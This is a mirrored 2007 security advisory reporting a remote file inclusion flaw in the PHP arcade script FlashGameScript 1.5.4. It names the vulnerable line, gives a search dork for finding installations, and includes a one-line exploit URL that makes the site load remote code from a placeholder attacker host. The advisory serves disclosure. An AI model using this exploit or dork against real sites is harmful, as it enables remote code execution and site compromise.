Computer Security

Security Advisory: FlashGameScript v1.5.4 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Hasadya Raed

  JBrowser acces to admin/config files

  WebSpell > 4.0 Authentication Bypass and arbitrary code execution

  Online Web Building v2.0 (id) Remote SQL Injection

From:malic89_(at)_gmail.com <malic89_(at)_gmail.com>
Date:23.02.2007
Subject:FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:        : aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version         :1.5.4
URL             :http://www.flashgamescript.com/
Dork            :Copyright © 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved
Price:          :$60
Description :
Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner’s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
       
at index.php line 28: $func =$_GET[func];
---------------
Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server